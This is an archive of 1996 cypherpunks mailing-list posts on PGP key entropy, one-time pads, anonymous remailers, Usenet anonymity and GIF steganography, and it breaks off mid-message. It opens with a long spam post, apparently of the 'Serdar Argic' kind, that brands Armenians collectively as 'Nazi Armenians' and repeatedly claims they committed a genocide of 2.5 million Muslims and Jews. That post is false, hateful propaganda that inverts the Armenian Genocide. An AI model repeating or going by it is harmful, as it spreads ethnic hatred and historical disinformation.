        _Thursday, August 2, 1984 issue of 'Armenian Reporter'_


In fact, by 1942, Nazi Armenians in Europe had established a vast
network of pro-German collaborators, that extended over two continents.
Thousands of Armenians were serving the German army and Waffen-SS in
Russia and Western Europe. Armenians were also involved in espionage and
fifth-column activities for Hitler in the Balkans and Arabian Peninsula.
They were promised an 'independent' state under German 'protection' in
an agreement signed by the 'Armenian National Council.' (A copy of
this agreement can be found in the 'Congressional Record,' November 1,
1945; see Document 1.) On this side of the Atlantic, Nazi Armenians
were aware of their brethrens alliance. They had often expressed
pro-Nazi sentiments until America entered the war.


In 1941, while the Jews were being assembled for their doom in the
Nazi concentration camps, the Nazi Armenians in Germany formed the
first Armenian battalion to fight alongside the Nazis. In 1943, this
battalion had grown into eight battalions of 30,000-strong under the
command of Dro (the butcher), who was the former dictator of x-Soviet/
Russian Armenia and the architect of the cold-blooded genocide of 2.5
million Muslim people between 1914-1920. An Armenian National Council
was formed by the notorious Dashnak Party leaders in Berlin, which was
recognized by the Nazis. Encouraged by this, the Armenians summarily
formed a provisional government that endorsed and espoused fully the
principles of the Nazis and declared themselves as the members of the
Aryan super race and full participants to Hitler's policy of extermination
of the Jews.

This Armenian-Nazi conspiracy against the Jews during WWII was an
"encore" performance staged by the Armenians during WWI when they
exterminated 2.5 million Muslim and Jewish people.



As early as 1934, K. S. Papazian asserted in _Patriotism Perverted_ that
the Armenians

        _lean toward Fascism and Hitlerism._[1]

At that time, he could not have foreseen that the Armenians would
actively assume a pro-German stance and even collaborate in World
War II. His book was dealing with the Armenian genocide of 2.5 million
Muslim and Jewish people in Eastern Anatolia and Russian Armenia.
However, extreme rightwing ideological tendencies could be observed
within the Soviet Armenian Government long before the outbreak of the
Second World War.

In 1936, for example, O. Zarmooni of the _Tzeghagrons_ was quoted
in the _Hairenik Weekly_ (an official mouthpiece for the ex-Soviet
Armenian Government):

_The race is force: it is treasure. If we follow history we shall
 see that races, due to their innate force, have created the nations
 and these have been secure only insofar as they have reverted to
 the race after becoming a nation. Today Germany and Italy are
 strong because as nations they live and breath in terms of race.
 On the other hand, Russia is comparatively weak because she is
 bereft of social sanctities._[2]

[1] K. S. Papazian, _Patriotism Perverted_ (Boston, Baikar Press
    1934), Preface.
[2] _Hairenik Weekly_ Friday, April 10, 1936, 'The Race is our
    Refuge' by O. Zarmooni.



The Armenian fascism traditionally employed extreme means for the
sake of Armenian cause, including massacres and genocide. In World
War I, Russian Armenian Government annihilated the entire Muslim
population of Russian Armenia and exterminated millions of Muslim
and Sephardic Jews in Eastern Anatolia. While having collaborated
with the Nazis against Stalin during the Second World War, Nazi
Armenians changed their policy after Hitler's defeat. They now
backed Stalin's claims on Eastern Turkish provinces, hoping that
these would be annexed to Soviet Armenia and their Muslim population
would be exterminated again. Stalin played on Armenian national
sentiments to enlist the support of Armenians in the USSR and
America for his imperial ambitions.[1] Stalin's ultimatum to the
Turkish government led Truman to formulate his famous Doctrine.

[1] Walter Kolarz, _Religion in the Soviet Union_ (London, Macmillan &
    Co Ltd; New York, St Martin's Press 1961), pp. 160-164.



Nazi Germany had shown interest in nationalities, as a tool to
dismember the Russian empire, back in World War I. In the time
between the two World Wars, expelled leaders of Soviet nationalities
were lobbying the capitals of European powers to gain support for
their respective causes. Already in 1936, the SS Headquarters
(Reichssicherheitshauptamt) had created bureaus (Vertrauensstellen)
to contact emigrants and oversee their activities. The Vertrauensstellen
for the Caucasus was led by the Armenian Deirajr Froundjian and the
Georgian Lado Achmeteli.[1]

Shortly after the occupation of Warsaw and Paris, the German Abwehr
(Secret Service) assumed ties with exiled leaders of diverse Soviet
nationalities, among them Russian Armenian Government officials.[2]
One of the leaders of the ex-Soviet Armenian Government, the aforementioned
General Dro (the butcher), who was the chief architect of the Armenian
genocide of 2.5 million Muslim people in Russian Armenia and Eastern
Anatolia between 1914-1920. An Armenian National Council was formed
by the notorious (Drastamat Kanajan) began working relationship with
the Nazis around that time.

[1] Patrick von zur Muhlen (Muehlen), _Zwischen Hakenkreuz und
    Sowjetstern_ (Droste Verlag Duesseldorf 1971), p. 37.
[2] Ibid., p. 84.




In April 1942, Hitler was preparing for the invasion of the
Caucasus. A number of Nazi Armenian leaders began submitting
plans to German officials in spring and summer 1942. One of
them was Souren Begzadian Paikhar, son of a former ambassador
of the Armenian Republic in Baku. Paikhar wrote a letter to
Hitler, asking for German support to his Armenian national
socialist movement Hossank and suggesting the creation of an
Armenian SS formation in order

_to educate the youth of liberated Armenia according to the
 spirit of the Nazi ideas._

He wanted to unite the Armenians of the already occupied territories
of the USSR in his movement and with them conquer historic Muslim
homeland. Paikhar was confined to serving the Nazis in Goebbels
Propaganda ministry as a speaker for Armenian- and French-language
radio broadcastings.[1] The Armenian-language broadcastings were
produced by yet another Nazi Armenian Viguen Chanth.[2]

[1] Patrick von zur Muhlen (Muehlen), p. 106.
[2] Enno Meyer, A. J. Berkian, _Zwischen Rhein und Arax, 900
    Jahre Deutsch-Armenische beziehungen_ (Heinz Holzberg
    Verlag-Oldenburg 1988), pp. 124 and 129.




A genocide is a deliberate and organized massacre of people
in an attempt to exterminate a race. This is the worst crime
in history. It happened to the Muslims in Russian Armenia and
Eastern Anatolia. 2.5 million Muslims were killed by Armenians
in the worst ways imaginable. It is sickening to think that
the human race is capable of such actions, but there is no
denying the fact that the Armenian genocide of 2.5 million
Muslims happened.

Furthermore, the establishment of Armenian units in the German
army was favored by General Dro (the Butcher), the architect
of the Armenian genocide of 2.5 million Muslim people. He played
an important role in the establishment of the Nzi Armenian _legions_
without assuming any official position. His views were represented
by his men in the respective organs. An interesting meeting took
place between Dro and Reichsfuehrer-SS Heinrich Himmler toward the
end of 1942.  Dro discussed matters of collaboration with Himmler
and after a long conversation, asked if he could visit POW camp
close to Berlin. Himmler provided Dro with his private car.[1]

A minor problem was that some of the Soviet nationals were not
_Aryans_ but _subhumans_ according to the official Nazi philosophy.
As such, they were subject to German racism. However, Armenians
were the least threatened and indeed most privileged. In August
1933, Armenians had been recognized as Aryans by the Bureau of
Racial Investigation in the Ministry for Domestic Affairs.

[1] Meyer, Berkian, ibid., pp. 112-113.


Altogether 30,000 Nazi Armenians served in various units in
the German Wehrmacht, according to Ara J. Berkian. 14,000
in predominantly Armenian army units, 6,000 in German army
units, 8,000 in various working units and 2,000 in the
Waffen-SS.[1]

A number of these Nazi Armenians were volunteers from France and
Greece who had chosen to commit themselves to the extermination
of the European Jewry. Derounian says that

_Nazi Armenians from France bore the mark 'Legion Armenienne.'_[2]

That Nazi Armenians like Dro 'the Butcher', Armenian architect
of the genocide of 2.5 million Muslim people, and Nezhdeh sided
with the Germans probably had an impact on the decision of
Armenians who overwhelmingly opted for armed service.

[1] Enno Meyer, A. J. Berkian, _Zwischen Rhein und Arax, 900
    Jahre Deutsch-Armenische beziehungen_ (Heinz Holzberg
    Verlag-Oldenburg 1988), pp. 118/119.
[2] John Roy Carlson (Arthur Derounian), ibid., p. 19.


In fall 1942, the Armenian infantry battalions 808 and 809 were formed,
to be followed by battalions 810, 812 and 813 in spring 1943. In the
second half of 1943 infantry battalions 814, 815 and 816 were created.
These battalions together with other indigenous Caucasian units were
attached to the infantry division 162. Also attached to ID 162 were
the field battalions II/9, I/125 and I/198 which were formed between
May 1942 and May 1943. Altogether twelve Armenian battalions served
the Nazi army, if battalion II/73, which was not employed at any time,
is to be included.[1] Most battalions were commanded by Nazi Armenian
officers. Armenians wore German uniforms with an armband in the Dashnag
colours red-blue-orange and the inscription _Armenien._

[1] Joachim Hoffmann, _Dies Ostlegionen 1941-1943, Turkotataren,
    Kaukasier und Wolgafinned im deutschen Heer_ (Verlag Rombach
    Freiburg 1976), p. 172.


The Armenian SS unit was formed following a directive of Himmler in
the beginning of December 1944.[1] The Armenian Liaison Staff actively
recruited volunteers[2] and by February 1945 a cavalry formation of
twenty thousand Armenians was integrated into the larger Caucasian
Waffen-SS unit. The Armenian SS formation was employed last in
Klagenfurt.[3] In addition to this exclusively Armenian unit, Nazi
Armenians also served in the thirty eight other SS divisions, one
of them even in the elite _Leibstandarte Adolf Hitler._[4]

[1] Meyer, Berkian, ibid., pp. 136-137.
[2] United States National Archives, T-175, Roll 167,
    pp 2700157/2700158, SS-Headquarters, Amtsgruppe D - Oststelle,
    see _Documents 3 and 4._
[3] Georg Tessin, _Verbaende und Truppen der deutschen Wehrmacht und
    Waffen-SS im zweiten Weltkrieg 1939-1945,_ (Frankfurt am Main
    1965-1980), Volume 14, Armenian Legion/Waffen SS.
[4] Meyer, Berkian, ibid., p. 119.



Derounian says that

_Greece was honeycombed with Armenians serving as Nazi spies._[1]

Many Nazi Armenians were arrested by the British and sentenced by
the Greek government as collaborators in espionage.[2] In Rumania
many Nazi Armenians were found in Antonescu's Iron Guard during
arrest of members after the war. Bulgaria was the operational base
of Tzeghagrons-founder Garagin Nezhdeh, who commanded a network of
espionage from there.

[1] John Roy Carlson (Arthur Derounian), ibid., p. 20.
[2] Meyer, Berkian, ibid., p. 150.

In Russia General Dro (the Butcher), the architect of the Muslim
Holocaust in ex-Soviet/Russian Armenia and Eastern Anatolia, was
working closely with the German Secret Service. He entered the war
zone with his own men and acquired important intelligence about the
Soviets. His experience with the Muslim Holocaust in ex-Soviet/Russian
Armenia and Eastern Anatolia made him an invaluable source for the
Germans.[1]

[1] Meyer, Berkian, ibid., p. 113; Patrick von zur Muehlen,
    ibid., p. 84.



Numerous articles in major newspapers (London Times) and periodicals
(Newsweek) during the war, had suggested the existence of a significant
collaboration between Armenians and the Nazis. Arthur Derounian deserves
credit for being the first person to deal with this issue extensively.
Derounian's motives were twofold: his deeply held democratic convictions
gave him a sense of duty and he felt obliged to shed light on this yet
another dark chapter of Armenian history. Concurrently, Derounian embarked
on what one would call _crisis control_ or face-saving. In order to
forestall any potential attacks on the larger Armenian community in
the United States, he marginalized collaboration as deplorable but
insignificant.[1]

[1] John Roy Carlson (real name Arthur Derounian), _The Plotters_
    E. P. Dutton & Company, Inc., New York 1946, p. 182.

Also, it is not surprising that the Armenians collaborated with the Nazis.

_Wholly opportunistic the Armenians have been variously pro-Nazi,
 pro-Russia, pro-Soviet Armenia, pro-Arab, pro-Jewish, as well as
 anti-Jewish, anti-Zionist, anti-Communist, and anti-Soviet - whichever
 was expedient._[1]

[1] John Roy Carlson (Arthur Derounian), _Cairo to Damascus_
    Alfred A. Knopf, New York, 1951, p. 438.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Oct 1996 18:54:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Paper on Network Security
Message-ID: <1.5.4.32.19961021015413.0067fab8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We posted news* a few days ago of a white paper by the
   OURS organization on network security. We have put it at:

      http://jya.com/recsec.htm  (63 kb)

   OURS is an our-gang of gorilla industries such as
   Bellcore, Chase, LDS(!), Compaq, DEC, EDS, EXXON, 
   IBM, Intel, MIT, Microsoft, Motorola, Novell, Oracle,
   Princeton, Security Dynamics (!), Societe Generale, Texaco
   and Ziff-Davis. Mother of all GAK-enfeebled alliances.

   The report was prepared by an Information Protection Task
   Force of OURS members assisted by Amex, ICL, Mergent and
   TIS.

   It's a fair overview of what mega-corporations fear of
   network vipers and what they pray will exorcize the
   Edenic mayhemics.

   Sorry, it's a bit too long for E-mail.

   * That original news report is at: http://jya.com/oursay.txt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 20 Oct 1996 22:29:54 -0700 (PDT)
To: C Kuethe <ckuethe@gpu.srv.ualberta.ca>
Subject: Re: Wrap Up: Conference on Law Enforcement and Intelligence
Message-ID: <199610210529.WAA26268@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 PM 10/20/96 -0600, C Kuethe wrote:
>On Sun, 20 Oct 1996, Bill Frantz wrote:
>> (3) The devil is in the details.  I still am not convinced that MacPGP has
>> enough sources of entropy for its IDEA key generation.  (But I am not
>> convinced that it doesn't either.)  I put integrating Jon Callas's entropy
>> manager into MacPGP as a high priority.
>
>Tell me more... I use macpgp.  I just built some new keys tonight, a 2048
>bit monster.  PGP wanted 1496 bits of rand info... where is it's entropy
>"Hole"
>
>And what is the "Entropy Manager"?

When you build RSA keys in PGP it uses keyboard timings to acquire "true
randomness" or entropy.  This kind of randomness is related to quantum
mechanical uncertainty.  It probably has enough entropy to safely generate
RSA keys by the keyboard technique it uses.

In addition to RSA keys, it generates symmetric IDEA keys whenever you send
a message.  It uses keystrokes accumulated during normal operation and
saved in a file called randpool (or something like that) to generate these
keys.  Since you almost never enter keystrokes during the normal operation
of MacPGP, I am concerned that randpool does not have enough entropy.

Entropy Manager is a program Jon Callas of Apple is working on.  It uses
well-known sources of entropy in the computer to build up a pool of entropy
for use by programs that need it.  The last I heard, it was nearly ready. 
I would trust it more than the ported PGP since Jon has examined sources
available in the Macintosh specifically.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Sun, 20 Oct 1996 20:41:32 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <ask5VD23w165w@bwalk.dm.com>
Message-ID: <326af0da1e81002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM said:
> 
> Dr. Serdar Argic is a world-famous historian 

Hmm, that's odd, I had heard he was a CSci grad student here.

I guess I'll have to take a stroll over and check out the PhD thesis,
probably subtitled "Determining meaning of words by usage; Turkey
can also be a bird".

Heh.

-- 
Kevin L. Prigge                     | Some mornings, it's just not worth
Systems Software Programmer         | chewing through the leather straps.
Internet Enterprise - OIT           | - Emo Phillips
University of Minnesota             |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Kuethe <ckuethe@gpu.srv.ualberta.ca>
Date: Sun, 20 Oct 1996 22:13:43 -0700 (PDT)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Wrap Up: Conference on Law Enforcement and Intelligence
In-Reply-To: <199610202107.OAA06194@netcom7.netcom.com>
Message-ID: <Pine.A32.3.93.961020215729.22498B-100000@gpu3.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 20 Oct 1996, Bill Frantz wrote:

> >"... PGP may not survive as a viable option for private security."
> >
> >For the full quote, see:
> > http://www.nla.gov.au/gii/sess3.html
> 
> (1) If I were faced with an opponent who had a crypto system I couldn't
> break, I would attempt to make him think I could break it so he would stop
> using it.  AKA FUD.
> 
> (2) If I could break his system, I would want him to continue using it.  I
> would have to be very careful about how I used the material so he didn't
> catch on to the break.  There are some wonderful examples of this logic in
> "The Code Breakers".
> 
> (3) The devil is in the details.  I still am not convinced that MacPGP has
> enough sources of entropy for its IDEA key generation.  (But I am not
> convinced that it doesn't either.)  I put integrating Jon Callas's entropy
> manager into MacPGP as a high priority.

Tell me more... I use macpgp.  I just built some new keys tonight, a 2048
bit monster.  PGP wanted 1496 bits of rand info... where is it's entropy
"Hole"

And what is the "Entropy Manager"?

--
Chris Kuethe <ckuethe@gpu.srv.ualberta.ca> LPGV Electronics and Controls

RSA in 3 lines of PERL:
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 20 Oct 1996 20:44:27 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Alice in Cypherspace
Message-ID: <199610210344.XAA16703@nrk.com>
MIME-Version: 1.0
Content-Type: text


I found my copy, if the person asking last week still
needs it....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 21 Oct 1996 00:43:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Usenet and Re: extortion via digital cash
Message-ID: <199610210742.AAA15873@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> As an already existing, widely
>disseminated and easily used message pool, Usenet is very valuable to us.
>I'm concerned that it may not last though.  Many people now complain about
>how low the signal to noise ratio is [...] So, if it gets too bad, might it
>just fade away? Or, if it remains but becomes unpopular, will it be easy to
>restrict if we use it for anonymous messages?

I haven't read all of Usenet in 10+ years :-)  But it keeps growing,
and if you're trying to piggyback anonymous messages on it, then it's great
to have VOLUME, VOLUME, VOLUME, as the talk.bizarre folks put it.

On the other hand, there are technical difficulties with using the
current modes of Usenet for real applications, and volume may make it worse.
Usenet used to work by flooding - every message goes to every machine,
so it's not suspicious your machine receives an Anonymous Message.
Most machines had multiple users (Unix, after all), and didn't log who
accessed what files in the news spool (which you could do directly
as well as through your newsreader.)

Now, however, most users use NNTP to fetch news articles from their ISP,
and the number of machines receiving the whole Nx100MB/day flood is probably
smaller,
though perhaps businesses and universities are putting up with it,
and perhaps the usage patterns are different outside North America.
Fetching material by NNTP is probably logged by many ISPs, and can also
be detected by sniffers in the places where security is weak enough for them,
which probably includes many major ISPs.  So it's easier to detect who's
reading alt.anonymous.messages, especially if some government agency
subpoenas logfiles.

azur@netcom.com (Steve Schear) wrote:
>In the U.S., at least, attempts to enforce identification of Internet users
>or anonymous posters to newgroups and such are likely to meet with stiff
>legal resistance.  The Supreme Court has ruled that anonymous use of
>protected speech (e.g., political handbills) must be permitted.

No legal resistance at all, if it's done by ISPs or businesses or individuals -
only if the government tries it does it get into "protected speech" territory.
There may be market resistance, and the Internet and Usenet are fundamentally
worldwide cooperative efforts, so if the protocols support anonymity,
then participants in the nets can choose to have their systems cooperate with
or refuse to cooperate with anonymous messages, and you'll find some people
doing each one.  This may mean that small-ISP.net and xs4all.nl will permit 
anonymous users and aol.com, compuserve.com, and proxy.gov.sg will demand 
Internet Driver's Licenses to let your postings through, while nihilism.net
won't allow any non-anomymous messages.  Spontaneous order is like that.

And the US government could probably get away with sponsoring Internet
access for Real American Citizens and Green-Card Holders that requires
positive identification because you can file your tax forms over it,
as long as they don't prevent anonymous messages on _some_ part of the net.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 20 Oct 1996 21:55:45 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Dimitri
Message-ID: <199610210453.AAA17082@nrk.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM sez:
> Sounds like a crontab job, or Timmy May, or both.

THIS sounds like our friend SternFUD. 
{Who, BTW, is back attacking folks in the pgp groups..}


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 21 Oct 1996 01:31:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [crypto-philo]OTP or DES?
Message-ID: <199610210830.BAA16727@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:45 AM 10/20/95 -0500, walrus <walrus@tcgcs.com> wrote:
>I would argue that the security of an OTP is
>derived not from the fact that it really is secure, but from the fact that
>it is claimed to be an OTP.  

The meaning of "Security" depends on your threat model.
Are you worried about
- having your message noticed?
- having your message decoded?
- being able to deny a possible decoding of your message?

Whether your message noticed or not depends a lot on the environment;
in some places "pure noise" is not noticeable, while in others it
really stands out (posting it to a text newsgroup, for instance.)
If you simply remove the "----- BEGIN PGP" etc. headers/trailers from a PGP
message,
it's still got a well-defined format, including magic numbers indicating
what kind of data is in each block, block length indicators, etc.
They're both noticeable to someone who's trying to find them and
strong evidence that something is a PGP message.  That's why there's a
Stealth-PGP, though even it's not perfect.

As far as "Secure" meaning "They can't decode the message",
if you use a One-Time-Pad more than once, you can lose (viz. VENONA.)
If you use a pad that's not true random numbers, but is some simple
LFSR or LCM PRNG, or some random English-language book, it's pretty easy
for skilled cryptanalysts to decode it.

If you use something that has a well-defined structure as a pad,
and the Bad Guys notice your message and decode it, it's not credible
to say "oh, no, it's just a one-time pad, the fact that there's
one chance in 2**168 of that particular series of random numbers
matching the output of triple-DES shouldn't influence you any, Judge"....
You're gonna go to jail.    

What gives you deniability with OTPs is that they _can't_ produce a 
meaningful message that's any more probable than any other meaningful 
message of the same length, so you can argue that it really says
"BUY MORE" instead of "RUN AWAY" or "ATTACK!!" and even if they guess
you're lying, they can't tell what the true message was.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sun, 20 Oct 1996 08:12:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [crypto-philo]OTP or DES?
In-Reply-To: <199610200808.IAA15049@tcgcs.com>
Message-ID: <199610201246.BAA27860@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Oct 1995 02:45:28 -0500, walrus wrote:

   it is claimed to be an OTP.  Imagine a plaintext, encrypted with triple-des.
   It looks like a bunch of 1's and 0's to the casual observer, but to you it
   is your secret plan to take over the world.  Or so you would have us believe
   if we crack the cypher.
   actually you plan to take over the world using a completely different plan.
   It is quite easy to take the bits of the des-encrypted message, and
   calculate the OTP key nessasary to decrypt the message into your real plan.

Yes, but if you _really_ used a OTP to encrypt your real plans, the
probability that the ciphertext would decrypt via DES to anything
intelligible is so amazingly minute that no one would believe you.
It's like _one_ monkey typing out flawlessly the complete works of
Shakespeare.  On a Wednesday afternoon... :-)

   using that particular key means nothing, because a true OTP can generate
   that bit sequence.

And I can instantly break any encrypted message I see, by correctly
guessing the algorithm and the key.  I'd bet against it, though.

In fact, I don't even need to see it!!  I can guess the ciphertext, too
:-)

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Fourth Law of Thermodynamics:  If the probability of success is not
almost one, it is damn near zero.
		-- David Ellis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 20 Oct 1996 22:50:13 -0700 (PDT)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Wrap Up: Conference on Law Enforcement and Intelligence
In-Reply-To: <199610202107.OAA06194@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.94.961021014226.22219B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 20 Oct 1996, Bill Frantz wrote:

> At  1:03 PM 10/20/96 +0000, James Morris wrote:
> >On Sat, 19 Oct 1996, Black Unicorn wrote:
> >
> >> 4.  Might be a good idea to review implementations of crypto.
> >> 
> >> Both James Woolsey and Stewart Baker made sly remarks about the
> >> reliability of crypto in the public domain. [...]
> >
> >There was also an interesting comment made in session three of the 
> >Joint Australian/OECD Conference on Security, Privacy and Intellectual 
> >Property Protection in theGlobal Information Infrastructure,
> >(Canberra, 7 - 8 February 1996), reportedly by a representative of 
> >the DSD:
> >
> >"... PGP may not survive as a viable option for private security."
> >
> >For the full quote, see:
> > http://www.nla.gov.au/gii/sess3.html
> 
> (1) If I were faced with an opponent who had a crypto system I couldn't
> break, I would attempt to make him think I could break it so he would stop
> using it.  AKA FUD.

Don't think I didn't consider it.  The conference was not attended by the
type on whom FUD would make much difference.  i.e., it was mostly law
enforcement and intelligence.  These were either quite sincere snickerings
among professionals, or EXCEEDINGLY well laid misinformation put into the
wrong circles to be of any effect.

Again, nothing specific, but implementation seemed to be the key.  I would
also note that I don't typically pay such ramblings much mind.  When
Stewart Baker tells someone IDEA and 3DES are indeed strong but
implementation weaknesses can cripple them, and this in the context of a
law enforcement ban, I tend to listen carefully.

I'm not saying panic, I'm saying perhaps another careful review is in
order.

> (2) If I could break his system, I would want him to continue using it.  I
> would have to be very careful about how I used the material so he didn't
> catch on to the break.  There are some wonderful examples of this logic in
> "The Code Breakers".

Then the absolute wrong thing to do would be to suggest something that
might spur on review.  (Such as to draw attention to potential
implementation problems)

When both Stewart Baker and R. James Woolsey make similar comments, one
can't help but think that they were not pre-arranged.

Again, don't panic, just review.

> (3) The devil is in the details.  I still am not convinced that MacPGP has
> enough sources of entropy for its IDEA key generation.  (But I am not
> convinced that it doesn't either.)  I put integrating Jon Callas's entropy
> manager into MacPGP as a high priority.

Couldn't hurt, not one bit.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 21 Oct 1996 10:10:01 -0700 (PDT)
To: unicorn@schloss.li
Subject: Re: ABA Conference on Law Enfrocement and Intelligence - Debrief
In-Reply-To: <Pine.SUN.3.94.961019135625.19884J-100000@polaris>
Message-ID: <199610210248.DAA00261@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn <unicorn@schloss.li> writes:
> The American Bar Association Standing Committee on Law and 
> National Security - Law Enforcement and Intelligence Conference - 
> Debrief
> 
> [...]
> 
> Michael A. Vatis
> Associate Deputy Attorney General
> Office of the Deputy Attorney General
> U.S. Department of Justice
> 
> Vatis is a young shining star in Justice, a Gorelick protege and
> likely to be the most dangerous individual to cypherpunks in the
> coming years if he stays with justice.  Vatis understands remailers,
> encryption, PGP, even mentioned "mixmaster" and so forth
> specificlly.  He is sly, knows just when to shut up and is probably
> the front man on the DoJ attempt to attack remailers and anonymous
> communications in general.  He is a real problem for cypherpunks and
> the party is clearly over.

If the DoJ and company are going to be trying to break remailers, I
think it's time someone brushed up the mixmaster alpha code with
forward secrecy to release quality.

Let them at least fight the "real thing".

The current version of mixmaster, which all the mixmasters are using
is 2.0.3.  Lance Cottrell has an alpha version which has direct IP
transport, and DH forward secrecy.  This alpha version I understand
needs debugging, and fixing up.  If you are in the US, you may find it
starting from:

	http://www.obscura.com/crypto.html

My suggestion would be for someone who has access to the alpha version
with forward secrecy, to spend some time getting it to release
quality, and put in the credits thanks to Michael Vatis for
"motivation" :-)

[If anyone knows of a place where the alpha version of the aforementioned
software has found it's way overseas, please forward the URL]

(Needless to say forward secrecy is a big advantage, you can't record
all IP packets out of the remailers, and then use threats (rubber hose
cryptanalsis/threat of expensive litigation) to extract the remailer
keys to decrypt after the fact, and trace messages down the chain.)

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Mon, 21 Oct 1996 01:53:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Stego via TCP/IP (was Re: crypto wish list)
In-Reply-To: <199610210018.RAA20993@dfw-ix5.ix.netcom.com>
Message-ID: <0mOnaO200YUe1ZflM0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
> I've been wondering about _un_sophisticated stego,
> for cases where you're trying to slip below the radar
> of simple bots or dumber eavesdropping thugs.  For instance,
> you could send that DOS executable .exe or animated GIF
> which really _does_ expand into the cover-traffic file or 
> generate the annoying flaming background for your web page,
> but which also drags along a bunch of stegobits that
> the executable thinks are just data it's ignoring or the
> GIF thinks is past the last frame.

Actually, animated gifs provide an excellent carrier for regular
stego. Just create your gif with 32 or so colors, then use the rest of
the bits for close matches. You could, say, use the standard
intersection of the Mac/Windoze pallettes. With something like this,
you get like 3 bits per pixel (if you do the color map right), which
could be enormous with a big animated gif.

Liking lossless animation standards,
Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 21 Oct 1996 06:45:05 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Paper on Network Security
In-Reply-To: <1.5.4.32.19961021015413.0067fab8@pop.pipeline.com>
Message-ID: <Pine.SUN.3.91.961021064415.4415B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 20 Oct 1996, John Young wrote:

